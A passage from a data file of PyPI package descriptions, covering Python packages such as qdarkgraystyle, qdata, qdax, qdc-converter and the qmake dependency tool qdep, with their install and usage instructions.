para\ndetermina\u00e7\u00e3o de transpar\u00eancia de Secchi na Lagoa da Concei\u00e7\u00e3o \u2013 SC, a\npartir de imagens multiespectrais do sensor Operational Land Imager\n(OLI) -Landsat-8. Anais do XXI Simp\u00f3sio Brasileiro de Recursos H\u00eddricos.H\u00c4RM\u00c4, P. et al.\u00a0(2001). Detecting chlorophyll, Secchi disk depth and\nsurface temperature in a sub-alpine lake using Landsat imagery. The\nScience of Total Environment, v. 268, pp.\u00a0107-121.Trophic State IndexLAMPARELLI, M.C. (2004) Grau de trofia em corpos d\u2019\u00e1gua do estado de S\u00e3o\nPaulo: avalia\u00e7\u00e3o dos m\u00e9todos de monitoramento. Thesis (Phd) \u2013 University\nof S\u00e3o Paulo, S\u00e3o Paulo.Reservoir Water Quality IndexQUALIDADE DE \u00c1GUA EM RESERVAT\u00d3RIOS\n(IQAR)Authors & ContributorsDeveloped by CERTI Foundation.This research was supported by FOZ DO CHAPEC\u00d3 ENERGIA S.A research and\ntechnological development program,through the PD-02949-2405/2019 project, regulated by Brazilian\nElectricity Regulatory Agency (ANEEL).LicenseThis repository is licensed under the terms of the BSD-style license."} +{"package": "qdarkgraystyle", "pacakge-description": "QDarkGray StylesheetA dark gray stylesheet for PyQt5 applications. This theme is a gray variation ofQDarkStyleSheettheme.InstallationInstallqdarkgraystylepackage using thesetupscript or usingpippythonsetup.pyinstallorpipinstallqdarkgraystyleThePySideandPyQt4support was dropped in version1.0.0. To useqdarkgraystylewithPySideorPyQt4or withPython 2.7, please use the version0.0.3.pipinstallqdarkgraystyle==0.0.3The support toPySide2will be add in future.UsageHere is an example using PyQt5.importsysimportqdarkgraystylefromPyQt5importQtGui# create the application and the main windowapp=QtGui.QApplication(sys.argv)window=QtGui.QMainWindow()# setup stylesheetapp.setStyleSheet(qdarkgraystyle.load_stylesheet())# runwindow.show()app.exec_()There is an example included in theexamplefolder.pythonexample/example_pyqt5.pyYou can run the script without installingqdarkgraystyle. You only need to have\nPyQt5 installed on your system.ContributeIssue Tracker:https://github.com/mstuttgart/qdarkgraystyle/issuesSource Code:https://github.com/mstuttgart/qdarkgraystyleSnapshotsHere are a few snapshots:Screenshot 1Screenshot 2Screenshot 3ContributingFork it (https://github.com/mstuttgart/qdarkgraystyle/fork)Create your feature branch (git checkout-bfeature/fooBar)Commit your changes (git commit-am'Add some fooBar')Push to the branch (git push origin feature/fooBar)Create a new Pull RequestCreditsThis package is totally based onQDarkStyleSheettheme created byColin Duquesnoy.Copyright (C) 2017-2018 by Michell Stuttgart"} +{"package": "qdash", "pacakge-description": "No description available on PyPI."} +{"package": "qdata", "pacakge-description": "Qdata - Python SDK for index and search\u4e3a\u4ec0\u4e48\u7ed9\u9879\u76ee\u6539\u4e86\u540d\u60f3\u505a\u4e00\u4e2a\u63d0\u4f9b\u66f4\u591a\u6570\u636e\u7684SDK\u5305,\u4f46\u4e0d\u4e00\u5b9a\u6709\u65f6\u95f4\u3002\u3002\u3002\u8001\u7684\u4ee3\u7801\u5305\u53ef\u4ee5\u5728old_baiduindex\u91cc\u627e\u5230\u4f1a\u6839\u636e\u6211\u81ea\u5df1\u4e2a\u4eba\u7684\u6570\u636e\u9700\u6c42\uff0c\u5f80\u91cc\u9762\u6dfb\u52a0\u4e0d\u540c\u7684\u6570\u636e\u6e90\uff0c\u5982\u679c\u6070\u597d\u5e2e\u52a9\u5230\u4f60\uff0c\u5f88\u5f00\u5fc3\u8001\u7684\u6570\u636e\u6e90\u4f1a\u5c3d\u529b\u7ef4\u62a4Data Sourcehttp://index.baidu.com/http://www.baidu.com/https://www.tianyancha.com/advance/searchInstallpipuninstallpycrypto# \u907f\u514d\u4e0epycryptodome\u51b2\u7a81pipinstall--upgradeqdataExamples\u767e\u5ea6\u6307\u6570./examples/test_baidu_index.py\u53ef\u4ee5\u53c2\u8003\u4ee5\u4e0b\u4ee3\u7801\u8fdb\u884c\u767e\u5ea6\u6307\u6570\u7684\u83b7\u53d6./examples/baidu_index_best_practice.py\u767e\u5ea6\u641c\u7d22./examples/test_baidu_search.py\u767e\u5ea6\u767b\u5f55(\u83b7\u53d6\u767e\u5ea6Cookie)./examples/test_baidu_login.py\u76ee\u524d\u53ea\u63d0\u4f9b\u4e8c\u7ef4\u7801\u767b\u5f55\uff0c\u5bc6\u7801\u8d26\u53f7\u767b\u5f55\u4e5f\u53ef\u4ee5\u505a\uff0c\u4f46\u4e0d\u505a\uff0c\u56e0\u4e3a\u6ca1\u5fc5\u8981\u3002\u5e78\u597d\u5de5\u4f5c\u4e0d\u505a\u722c\u866b\uff0c\u5fc3\u592a\u7d2f\u4e86\u3002\u5929\u773c\u67e5./examples/test_tianyancha.py\u8001\u5a46\u505a\u6c47\u62a5\u7740\u6025\u7528Changelog2021/03/25 \u4e0a\u7ebf2021/03/26 \u66f4\u65b0\u767e\u5ea6\u767b\u5f55\u529f\u80fd2021/04/07 \u767e\u5ea6\u6307\u6570\u65b0\u589e:\u5b9e\u65f6\u767e\u5ea6\u6307\u65702021/04/13 \u6dfb\u52a0\u5929\u773c\u67e5\u9ad8\u7ea7\u641c\u7d22\u516c\u53f8\u6570\u6570\u636e2021/05/18 \u4fee\u6b63\u6253\u5305\u95ee\u98982022/05/12 \u767e\u5ea6\u6307\u6570\u6dfb\u52a0Cipher-Text(\u4e0d\u786e\u5b9a\u90e8\u5206\u903b\u8f91)2022/05/16 \u4e00\u4e9b\u5c0f\u7684\u6539\u52a82022/05/30 \u4fee\u6b63\u767e\u5ea6\u6307\u6570\u52a0\u5bc6\u903b\u8f912022/09/06 \u6dfb\u52a0\u68c0\u67e5\u5173\u952e\u8bcd\u65b9\u6cd5\u3001\u6dfb\u52a0\u6700\u4f73\u5b9e\u8df5\u811a\u672cStargazers over time"} +{"package": "qdataclass", "pacakge-description": "No description available on PyPI."} +{"package": "qdatalib", "pacakge-description": "qdatalibNote this project is under development, and will undergo a massive number of breaking changes###TODObetter namingexport to csvbetter handling of not existing filesDescriptionQDataLib is a library of wrappers around some of the most useful \u201ddata\u201d-functions in QCoDeS. The Idea of QDataLib is to keep track of your data files using a MongoDB database, and ease the export to other file formats than SQLiteInstallationTo install QDataLib from source do the following:$gitclonehttps://github.com/qdev-dk/QDataLib.git\n$cdQDataLib\n$pipinstall.UsageseehereRunning the testsIf you have gotten 'qdatalib' from source, you may run the tests locally.Installqdatalibalong with its test dependencies into your virtual environment by executing the following in the root folder$pipinstall.\n$pipinstall-rtest_requirements.txtThen runpytestin thetestsfolder.Building the documentationIf you have gottenqdatalibfrom source, you may build the docs locally.Installqdatalibalong with its documentation dependencies into your virtual environment by executing the following in the root folder$pipinstall.\n$pipinstall-rdocs_requirements.txtYou also need to installpandoc. If you are usingconda, that can be achieved by$condainstallpandocelse, seeherefor pandoc's installation instructions.Then runmake htmlin thedocsfolder. The next time you build the documentation, remember to runmake cleanbefore you runmake html."} +{"package": "qdatamatrix", "pacakge-description": "QDataMatrixA PyQt4/PyQt5 widget for viewing and editing aDataMatrixobject.Sebastiaan Math\u00f4tCopyright 2016-2023https://pydatamatrix.eu/AboutTheqdatamatrixpackage provides a graphical widget to view and edit adatamatrixobject.DependenciesPython 2.7 or >= 3.4datamatrixqtpyUsageSeeexample.py, included with the source code.Licenseqdatamatrixis licensed under theGNU General Public License\nv3."} +{"package": "qdatastream", "pacakge-description": "pure python implementation for Qt\u2019s QDataStream"} +{"package": "qdatum", "pacakge-description": "UNKNOWN"} +{"package": "qdax", "pacakge-description": "QDax: Accelerated Quality-DiversityQDax is a tool to accelerate Quality-Diversity (QD) and neuro-evolution algorithms through hardware accelerators and massive parallelization. QD algorithms usually take days/weeks to run on large CPU clusters. With QDax, QD algorithms can now be run in minutes! \u23e9 \u23e9 \ud83d\udd5bQDax has been developed as a research framework: it is flexible and easy to extend and build on and can be used for any problem setting. Get started with simple example and run a QD algorithm in minutes here!QDaxpaperQDaxdocumentationInstallationQDax is available on PyPI and can be installed with:pipinstallqdaxAlternatively, the latest commit of QDax can be installed directly from source with:pipinstallgit+https://github.com/adaptive-intelligent-robotics/QDax.git@mainInstalling QDax viapipinstalls a CPU-only version of JAX by default. To use QDax with NVidia GPUs, you must first installCUDA, CuDNN, and JAX with GPU support.However, we also provide and recommend using either Docker or conda environments to use the repository which by default provides GPU support. Detailed steps to do so are available in thedocumentation.Basic API UsageFor a full and interactive example to see how QDax works, we recommend starting with the tutorial-styleColab notebook. It is an example of the MAP-Elites algorithm used to evolve a population of controllers on a chosen Brax environment (Walker by default).However, a summary of the main API usage is provided below:importjaximportfunctoolsfromqdax.core.map_elitesimportMAPElitesfromqdax.core.containers.mapelites_repertoireimportcompute_euclidean_centroidsfromqdax.tasks.armimportarm_scoring_functionfromqdax.core.emitters.mutation_operatorsimportisoline_variationfromqdax.core.emitters.standard_emittersimportMixingEmitterfromqdax.utils.metricsimportdefault_qd_metricsseed=42num_param_dimensions=100# num DoF arminit_batch_size=100batch_size=1024num_iterations=50grid_shape=(100,100)min_param=0.0max_param=1.0min_bd=0.0max_bd=1.0# Init a random keyrandom_key=jax.random.PRNGKey(seed)# Init population of controllersrandom_key,subkey=jax.random.split(random_key)init_variables=jax.random.uniform(subkey,shape=(init_batch_size,num_param_dimensions),minval=min_param,maxval=max_param,)# Define emittervariation_fn=functools.partial(isoline_variation,iso_sigma=0.05,line_sigma=0.1,minval=min_param,maxval=max_param,)mixing_emitter=MixingEmitter(mutation_fn=lambdax,y:(x,y),variation_fn=variation_fn,variation_percentage=1.0,batch_size=batch_size,)# Define a metrics functionmetrics_fn=functools.partial(default_qd_metrics,qd_offset=0.0,)# Instantiate MAP-Elitesmap_elites=MAPElites(scoring_function=arm_scoring_function,emitter=mixing_emitter,metrics_function=metrics_fn,)# Compute the centroidscentroids=compute_euclidean_centroids(grid_shape=grid_shape,minval=min_bd,maxval=max_bd,)# Initializes repertoire and emitter staterepertoire,emitter_state,random_key=map_elites.init(init_variables,centroids,random_key)# Run MAP-Elites loopforiinrange(num_iterations):(repertoire,emitter_state,metrics,random_key,)=map_elites.update(repertoire,emitter_state,random_key,)# Get contents of repertoirerepertoire.genotypes,repertoire.fitnesses,repertoire.descriptorsQDax core algorithmsQDax currently supports the following algorithms:AlgorithmExampleMAP-ElitesCVT MAP-ElitesPolicy Gradient Assisted MAP-Elites (PGA-ME)QDPGCMA-MEOMG-MEGACMA-MEGAMulti-Objective MAP-Elites (MOME)MAP-Elites Evolution Strategies (MEES)MAP-Elites PBT (ME-PBT)MAP-Elites Low-Spread (ME-LS)QDax baseline algorithmsThe QDax library also provides implementations for some useful baseline algorithms:AlgorithmExampleDIAYNDADSSMERLNSGA2SPEA2Population Based Training (PBT)QDax TasksThe QDax library also provides numerous implementations for several standard Quality-Diversity tasks.All those implementations, and their descriptions are provided in thetasks directory.ContributingIssues and contributions are welcome. Please refer to thecontribution guidein the documentation for more details.Related ProjectsEvoJAX: Hardware-Accelerated Neuroevolution. EvoJAX is a scalable, general purpose, hardware-accelerated neuroevolution toolkit.Paperevosax: JAX-Based Evolution StrategiesCiting QDaxIf you use QDax in your research and want to cite it in your work, please use:@misc{chalumeau2023qdax,\n title={QDax: A Library for Quality-Diversity and Population-based Algorithms with Hardware Acceleration},\n author={Felix Chalumeau and Bryan Lim and Raphael Boige and Maxime Allard and Luca Grillotti and Manon Flageat and Valentin Mac\u00e9 and Arthur Flajolet and Thomas Pierrot and Antoine Cully},\n year={2023},\n eprint={2308.03665},\n archivePrefix={arXiv},\n primaryClass={cs.AI}\n}ContributorsQDax was developed and is maintained by theAdaptive & Intelligent Robotics Lab (AIRL)andInstaDeep."} +{"package": "qdb", "pacakge-description": "UNKNOWN"} +{"package": "qdbase", "pacakge-description": "Example PackageThis is a highky opinionated framework for developing applications.I have been using bits and pieces of this for over two decades. This\nis a very early release of code that I am origanizing and documenting\nfor use by others."} +{"package": "qdbd", "pacakge-description": "# qdbd\nSQLAlchemy model generation from [QuickDBD][1] schema text.WIP[1]:https://www.quickdatabasediagrams.com/"} +{"package": "qdbg", "pacakge-description": "qdbgQuick debug tool - a general purpose CLI debugging utilityIntroductionEliminate the wasted clicks and keystrokes involved with copying your error messages into a search bar.qdbgdoes this tedious task for you (and we know you do it a lot :wink:). Simply run any command, and when your program inevitably fails,qdbgwill automatically open a search tab for you.qdbgIn the unlikely event that your program runs successfully,qdbgwill stay out of your way.RequirementsA developer that runs faulty programsPython 3.7+Linux or OSX operating systemA functioning web browserDependenciesqdbgis implemented only using the Python3 standard library. The package does have a few developer dependencies, includingpython-poetry, that are listed inpyproject.toml.InstallationOSX / Linux (recommended)curl-sSLhttps://raw.githubusercontent.com/hermgerm29/qdbg/main/get-qdbg.py|python-WindowsNot supported.PyPIqdbgis available on PyPI, but the recommended install method is preferred.Creditsqdbg's installation script is heavily derived frompython-poetry."} +{"package": "qdc-converter", "pacakge-description": "\u0420\u0443\u0441\u0441\u043a\u0438\u0439|EnglishQDC \u041a\u043e\u043d\u0432\u0435\u0440\u0442\u0435\u0440\u041a\u043e\u043d\u0432\u0435\u0440\u0442\u0435\u0440 *.qdc(Garmin QuickDraw Contours)\u0432 \u0442\u0430\u0431\u043b\u0438\u0446\u0443 *.csv(CSV \u0442\u0430\u0431\u043b\u0438\u0446\u0430)\u0438\u043b\u0438 *.grd(\u0420\u0430\u0441\u0442\u0440 ESRI ASCII Grid)\u0423\u0441\u0442\u0430\u043d\u043e\u0432\u043a\u0430\u0423\u0441\u0442\u0430\u043d\u043e\u0432\u043a\u0430 \u043e\u0434\u043d\u0438\u043c \u0444\u0430\u0439\u043b\u043e\u043c\u0421\u043a\u0430\u0447\u0430\u0442\u044c\u0440\u0435\u043b\u0438\u0437.\u0423\u0441\u0442\u0430\u043d\u043e\u0432\u043a\u0430 \u0438\u0437 PyPI# CLIpipinstallqdc-converter# CLI + GUIpipinstallqdc-converter[gui]\u0423\u0441\u0442\u0430\u043d\u043e\u0432\u043a\u0430 \u0438\u0437 \u0440\u0435\u043f\u043e\u0437\u0438\u0442\u043e\u0440\u0438\u044fgitclonehttps://github.com/interlark/qdc-convertercdqdc-converter\n\npython-mvenvvenv# Windows.\\venv\\Scripts\\activate.bat# Linux, MacOS.venv/bin/activate# CLIpipinstall.# CLI + GUIpipinstall.[gui]\u0418\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435\u041e\u0441\u043d\u043e\u0432\u043d\u044b\u0435 \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u044b:-i,-o\u0438-l.\u041f\u0440\u0438\u043c\u0435\u0440 \u043a\u043e\u043d\u0432\u0435\u0440\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u044f \u043f\u0430\u043f\u043a\u0438Contours\u0441 \u0432\u043b\u043e\u0436\u0435\u043d\u043d\u044b\u043c\u0438 *.qdc\u0444\u0430\u0439\u043b\u0430\u043c\u0438 \u0432 \u0442\u0430\u0431\u043b\u0438\u0446\u0443export_table.csv\u0441 3 \u043f\u043e\u043b\u044f\u043c\u0438X(\u0434\u043e\u043b\u0433\u043e\u0442\u0430 \u0432 \u0434\u0435\u0441\u044f\u0442\u0438\u0447\u043d\u044b\u0445 \u0433\u0440\u0430\u0434\u0443\u0441\u0430\u0445),Y(\u0448\u0438\u0440\u043e\u0442\u0430 \u0432 \u0434\u0435\u0441\u044f\u0442\u0438\u0447\u043d\u044b\u0445 \u0433\u0440\u0430\u0434\u0443\u0441\u0430\u0445)\u0438Depth(m)(\u0433\u043b\u0443\u0431\u0438\u043d\u0430 \u0432 \u043c\u0435\u0442\u0440\u0430\u0445), \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044f \u0441\u043b\u043e\u0439 \u0434\u0430\u043d\u043d\u044b\u0445 L_1:qdc-converter -i \"Contours\" -o \"export_table.csv\" -l 1\u041f\u0440\u0438\u043c\u0435\u0440 \u043a\u043e\u043d\u0432\u0435\u0440\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u044f \u043f\u0430\u043f\u043a\u0438Contours\u0441 \u0432\u043b\u043e\u0436\u0435\u043d\u043d\u044b\u043c\u0438 *.qdc\u0444\u0430\u0439\u043b\u0430\u043c\u0438 \u0432 \u0440\u0430\u0441\u0442\u0440export_raster.grd, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044f \u0441\u043b\u043e\u0439 \u0434\u0430\u043d\u043d\u044b\u0445 L_0:qdc-converter -i \"Contours\" -o \"export_raster.grd\" -l 0\u041f\u043e\u043b\u0443\u0447\u0435\u043d\u043d\u044b\u0439 \u0440\u0430\u0441\u0442\u0440 \u043c\u043e\u0436\u043d\u043e \u0437\u0430\u0433\u0440\u0443\u0437\u0438\u0442\u044c \u0432\u043e \u043c\u043d\u043e\u0433\u0438\u0435 \u0413\u0418\u0421 (\u043d\u0430\u043f\u0440\u0438\u043c\u0435\u0440, QGIS) \u0438 \u0441\u043a\u043e\u043d\u0432\u0435\u0440\u0442\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u0432 \u0431\u043e\u043b\u0435\u0435 \u0431\u044b\u0441\u0442\u0440\u043e\u0447\u0438\u0442\u0430\u0435\u043c\u044b\u0439 \u0444\u043e\u0440\u043c\u0430\u0442.\u041f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u044bqdc-converter--helpUsage: qdc-converter [OPTIONS]\n\n QDC \u041a\u043e\u043d\u0432\u0435\u0440\u0442\u0435\u0440.\n\n \u041a\u043e\u043d\u0432\u0435\u0440\u0442\u0435\u0440 Garmin's QDC \u0444\u0430\u0439\u043b\u043e\u0432 \u0432 CSV \u0438\u043b\u0438 GRD.\n\nOptions:\n \u041e\u0441\u043d\u043e\u0432\u043d\u044b\u0435 \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u044b: \u041a\u043b\u044e\u0447\u0435\u0432\u044b\u0435 \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u044b \u043a\u043e\u043d\u0432\u0435\u0440\u0442\u0435\u0440\u0430\n -i, --qdc-folder-path DIRECTORY\n \u041f\u0443\u0442\u044c \u0434\u043e \u043f\u0430\u043f\u043a\u0438 \u0441\u043e \u0432\u043b\u043e\u0436\u0435\u043d\u043d\u044b\u043c\u0438 \u043a\u043e\u043d\u0442\u0443\u0440\u0430\u043c\u0438\n QuickDraw Contours (QDC). [required]\n\n -o, --output-path FILE \u041f\u0443\u0442\u044c \u0434\u043e \u0441\u043a\u043e\u043d\u0432\u0435\u0440\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u043e\u0433\u043e \u0444\u0430\u0439\u043b\u0430 (*.csv \u0438\u043b\u0438\n *.grd). [required]\n\n -l, --layer [0,1,2,3,4,5] \u0421\u043b\u043e\u0439 \u0434\u0430\u043d\u043d\u044b\u0445 (0 - Raw user data, 1 -\n Recommended). [0<=x<=5; required]\n \u041f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u044b \u043a\u043e\u0440\u0440\u0435\u043a\u0442\u0438\u0440\u043e\u0432\u043a\u0438: \u041a\u043e\u0440\u0440\u0435\u043a\u0442\u0438\u0440\u043e\u0432\u043a\u0438\n -dx, --x-correction FLOAT \u041a\u043e\u0440\u0440\u0435\u043a\u0442\u0438\u0440\u043e\u0432\u043a\u0430 X.\n -dy, --y-correction FLOAT \u041a\u043e\u0440\u0440\u0435\u043a\u0442\u0438\u0440\u043e\u0432\u043a\u0430 Y.\n -dz, --z-correction FLOAT \u041a\u043e\u0440\u0440\u0435\u043a\u0442\u0438\u0440\u043e\u0432\u043a\u0430 Z.\n CSV \u041f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u044b: \u041f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u044b \u043a\u0430\u0441\u0430\u044e\u0449\u0438\u0435\u0441\u044f \u0437\u0430\u043f\u0438\u0441\u0438 CSV \u0442\u0430\u0431\u043b\u0438\u0446\u044b\n -csvd, --csv-delimiter TEXT CSV \u0440\u0430\u0437\u0434\u0435\u043b\u0438\u0442\u0435\u043b\u044c \u0437\u043d\u0430\u0447\u0435\u043d\u0438\u0439 \u043a\u043e\u043b\u043e\u043d\u043e\u043a (\u043f\u043e-\u0443\u043c\u043e\u043b\u0447\u0430\u043d\u0438\u044e \",\").\n -csvs, --csv-skip-headers \u041d\u0435 \u0437\u0430\u043f\u0438\u0441\u044b\u0432\u0430\u0442\u044c \u0437\u0430\u0433\u043e\u043b\u043e\u0432\u043e\u043a \u0442\u0430\u0431\u043b\u0438\u0446\u044b.\n -csvy, --csv-yxz \u0418\u0437\u043c\u0435\u043d\u0438\u0442\u044c \u043f\u043e\u0440\u044f\u0434\u043e\u043a \u0437\u0430\u043f\u0438\u0441\u0438 \u0441 X,Y,Z \u043d\u0430 Y,X,Z \u0432\n CSV \u0442\u0430\u0431\u043b\u0438\u0446\u0435.\n \u0414\u0440\u0443\u0433\u0438\u0435 \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u044b: \u0414\u0440\u0443\u0433\u0438\u0435 \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u044b \u043a\u043e\u043d\u0432\u0435\u0440\u0442\u0435\u0440\u0430\n -st, --singlethreaded \u0417\u0430\u043f\u0443\u0441\u0442\u0438\u0442\u044c \u043a\u043e\u043d\u0432\u0435\u0440\u0442\u0435\u0440 \u0432 \u043e\u0434\u043d\u043e\u043c \u043f\u043e\u0442\u043e\u043a\u0435.\n -vc, --validity-codes \u0417\u0430\u043f\u0438\u0441\u044b\u0432\u0430\u0442\u044c \u043a\u043e\u0434 \u043a\u0430\u0447\u0435\u0441\u0442\u0432\u0430 \u0432\u043c\u0435\u0441\u0442\u043e \u0433\u043b\u0443\u0431\u0438\u043d\u044b.\n -q, --quite \"\u041c\u043e\u043b\u0447\u0430\u043b\u0438\u0432\u044b\u0439 \u0440\u0435\u0436\u0438\u043c\"\n --version Show the version and exit.\n --help Show this message and exit."} +{"package": "qddate", "pacakge-description": "qddateis a Python 3 lib that helps to parse any date strings from html pages extremely fast. This lib was created during long term\nnews aggregation efforts and analyzing in wild HTML pages with dates. It\u2019s not intended to have beautiful code,\nsupport for so much languages as possible and so on. It should help to process millons of strings to identify\nand parse dates. qddata was part of proprietary technology of \u201cnews reconstruction\u201d. It\u2019s used to automatically create\nRSS feeds from sites without it.If you are looking for more advanced (and slower) date parsing trydateparseranddateutil.DocumentationDocumentation is built automatically and can be found onRead the Docs.FeaturesMore than 348 date patterns supported (by the end 2017)Generic parsing of dates in English, Russian, Spanish, Portugenese and other languagesSupports strings with with left aligned dates and supplimental words. Example: \u201c12.03.1999 some text here\u201dExtremely fast, uses pyparsing, hard-coded constants and dirty speed optimizations tricksLimitationsNot all languages supported, more languages will be added by request and exampleNot so easy to add new language based date patterns as it\u2019s in dateparser for example.Could miss some rarely used date formatsDoesn\u2019t support relative datesDoesn\u2019t support calendarsSpeed optimizationAll constants are hard encoded, no external settingsUses only datetime and pyparsing as external libraries. No more dependencies, all reused code incorporated into the lib codeNo regular expressions, instead pre-generated pyparsing patternsIntensive pattern filtering using min/max text length filters and common text patternsNo one settings/data file loaded from diskUsageThe easiest way is to use theqddate.DateParserclass,\nand it\u2019sparsefunction.Popular Formats>>> import qddate\n>>> parser = qddate.DateParser()\n>>> parser.parse('2012-12-15')\ndatetime.datetime(2012, 12, 15, 0, 0)\n>>> parser.parse(u'Fri, 12 Dec 2014 10:55:50')\ndatetime.datetime(2014, 12, 12, 10, 55, 50)\n>>> parser.parse(u'\u043f\u044f\u0442\u043d\u0438\u0446\u0430, \u0438\u044e\u043b\u044f 17, 2015') # Russian (17 July 2015)\ndatetime.datetime(2015, 1, 13, 13, 34)This will try to parse a date from the given string, attempting to\ndetect the language each time.Dependenciesqddaterelies on following libraries in some ways:pyparsingis a module for advanced text processing.Supported languagesBulgarianCzechEnglishFrenchGermanPortugueseRussianSpanishThanksI wrote this date parsing code at 2008 year and later only updated it several times, migrating from regular expressions\nto pyparsing. Looking atdateparser clean code and documentation motivated me\nto return to this code and to clean it up and to share it publicly. I\u2019ve used same documentation and code style approach\nand reused build scripts and documentation generation style from dateutil.\nMany thanks to ScrapingHub team!"} +{"package": "qdds", "pacakge-description": "qddsQuick Django Dev Server usingClickInstall:$ pip install qddsUsing qdds:Inside your Django project folder where manage.py resides\n\n$ devserver\n\nThis will start run the equivalent of\n\n$ ./manage.py runserver 0.0.0.0:8000\n\nThis makes it run the dev server where it is listening on your IP:8000, and other people on the networks, or your phone on the WiFi can reach the server.Options:You can also use the -regular option to use runserver normally\n\n$ devserver -regular\n\nbut don't do this, its silly."} +{"package": "qde", "pacakge-description": "Quality Data ExtractorQDE lets you extract the quality data from a generated data set.Get a relatively smaller data setGenerate new automated samples of it using any generative model.Pass both the sets into qde and get filtered combined data.How to use qdeFit training, generated and test data into qdeqde_obj=qde.quality_data_extractor()qde_obj.fit(train_set,new_set,test_set)Get accuracy of unfiltered combined dataqde_obj.get_accuracy()Get filtered data along with its accuracy using method 1comb_data_1,accuracy_1=qde_obj.get_combined_data(recipe=0)Get filtered data along with its accuracy using method 2comb_data_2,accuracy_2=qde_obj.get_combined_data(recipe=1)"} +{"package": "qdeep", "pacakge-description": "Deep Q Learning FrameworkSimple Deep Q Learning framework. This is just a slightly modified version ofDeepMind Acme's implementation of a deep Q network,\nwith a few extra utilities. You can install it withpipby using the following command:$ pip install qdeep"} +{"package": "qdep", "pacakge-description": "qdepA very basic yet simple to use dependency management tool for qmake based projects.Table of contentsqdepFeaturesDesign Goals/ScopeInstallationPreparing qmakeShell completitionsGetting startedGetting deeperDependency IDsVersioningPackage-uniqueness and version conflictsNormal dependenciesTranslationsLibrary supportCreating normal dependenciesCreating qdep translationsResources and hooksAutomatic exportsProject dependenciesCreating project dependenciesDocumentationCommand line interfacePublic API operations:Private API operations:QMAKE-FeatureVariablesCommon VariablesSUBDIRS extensionAdvanced VariablesConfiguration valuesInput valueOutput valuesDefinesEnvironment variablesPublic make targetsInternalVariablesConfiguration valuesQMAKE test functionsQMAKE replace functionsTable of contents generated with markdown-tocFeaturesSeamless integration in qmake projects - no extra files neededBasic dependency management using git repositories as package sourcesGlobally caches source files to speed up buildsPackages are simple pri-files that are included by the target projectRecursive dependency solvingAllows branch and tag based versioningSupports translations for qdep packagesSupports automatic export of qdep packages from dynamic librariesHandles QRC-Resources and startup hooks to work even when used in static librariesSupports special \"Project dependencies\" wich allows you to add whole qmake projects to a SUBDIRS projectCan generate \"library export\" pri files that provide an easy and reliable way to link against librariesImplicitly supports exported qdep packages and projectsDesign Goals/Scopeqdep was designed with the following goals in mind:Full qmake integration: qdep should not require any extra commands to install packages and prepare a project to be built. Just running qmake on the target project should take care of thisSimple installation: Using python makes it easy to use the tool on any platform. Besides the install only a single setup command is needed to make qdep work for any Qt installationFull Qt support: All features of Qt - including resources, startup hooks and translations should be supported with minimal effort for application developersLibrary exports: Since all qdep packages are source based, having multiple libraries that use the same package can be problematic. With qdep, one can \"export\" a package from a library, making it available to all the others.No additional server infrastructure: qdep should not require any extra servers to provide a package index. Any git repository can server as a package without any extra preparations neededPlease note that qdep is kept intentionally small to fullfill exactly those goals. Other build systems or more complex package management features are not supported and never will be. This project will stay active until the Qt Company switches their build systems to CMake. At that point this project will either be dropped or ported to CMake, depending on what alternative solutions already exist at that point.InstallationTo install the package, follow one of the following possibilities. Please note that only Python >= 3.7 is officially supported. Earlier versions might work as well, but have not been tested.Arch Linux:Use the AUR-Package:qdepAny Platform:Install via pip:pip install qdepAny Platform:Clone the repository and install the sources directly:python setup.py installPreparing qmakeAfter installing (except when using the AUR-package), you have to \"enable\" qdep for each Qt-Kit you want to use qdep with. This can be done by opening a terminal and calling:qdepprfgen--qmake\"
\"For example, if you have installed Qt 5.12.0 for MSVC 2017 x64 on windows in the default location (C:\\Qt), the command would look like this:qdepprfgen--qmake\"C:\\Qt\\5.12.0\\msvc2017_64\\bin\\qmake.exe\"Note:Depending on how the corresponding Qt-Kit was installed, you might need to run the command with administrator/sudo permissions. Alternatively, you can call the command with--dir /some/pathand export that very same path as value to theQMAKEPATHenvironment variable, if you have no such permissions.Shell completitionsFor Unix systems, qdep makes use ofargcompleteto provide completitions for bash/zsh to activate them, add the following code your shell initializer scripts:Forzsh, add this to~/.zshrc:autoloadbashcompinit\nbashcompinit\nautoloadcompinit\ncompiniteval\"$(register-python-argcompleteqdep)\"Forbash, add this to~/.bashrc:eval \"$(register-python-argcomplete qdep)\"When using BASH, you can alternatively use global completition - seeActivating global completionfor more details on that. Other shells might work as well, depending on how well argcomplete works with them. Refer to the argcomplete documentation and their GitHub Repository .Getting startedThe basic usage of qdep is very simple. For this example, we assume you want to add for exampleQHotkeyto a project via qdep. All you have to do is to install (and prepare) qdep and then add the following two lines to your pro-file:QDEP_DEPENDS += Skycoder42/QHotkey\n!load(qdep):error(\"Failed to load qdep feature\")Thats it! The next time you run qmake qdep will automatically download the latest release and add them to your project. Just compile the project and you can use the library. A more explicit way to specify the package (and what that shorter string extends to) would behttps://github.com/Skycoder42/QHotkey.git@1.2.2/qhotkey.priGetting deeperBesides this basic functionality of referencing qdep packages, qdep offers a few additional things to make using (and developing) those easier. In the following sections, they will be explained in detail.Dependency IDsQdep dependencies are described by IDs. These IDs follow the format[@[/]]. The only relevant part is the URL, and it can either be implicit or explicit. Implicit URLs follow the format/and are automatically expanded tohttps://github.com//.git. For the explicit format, all kinds of GIT-URLs are supportet, i.e. HTTPS, SSH and FILE urls.If you leave out the path part of a qdep package, qdep assumes that there is a pri file named.priin the repositories root directory. If that is not the case, or if a package has multiple different pri files to choose from, you can specify a path relative to the repositories root to that pri file to use that one instead of the automatically detected one.VersioningQdep supports 3 kinds of versioning: Unversioned, branches, 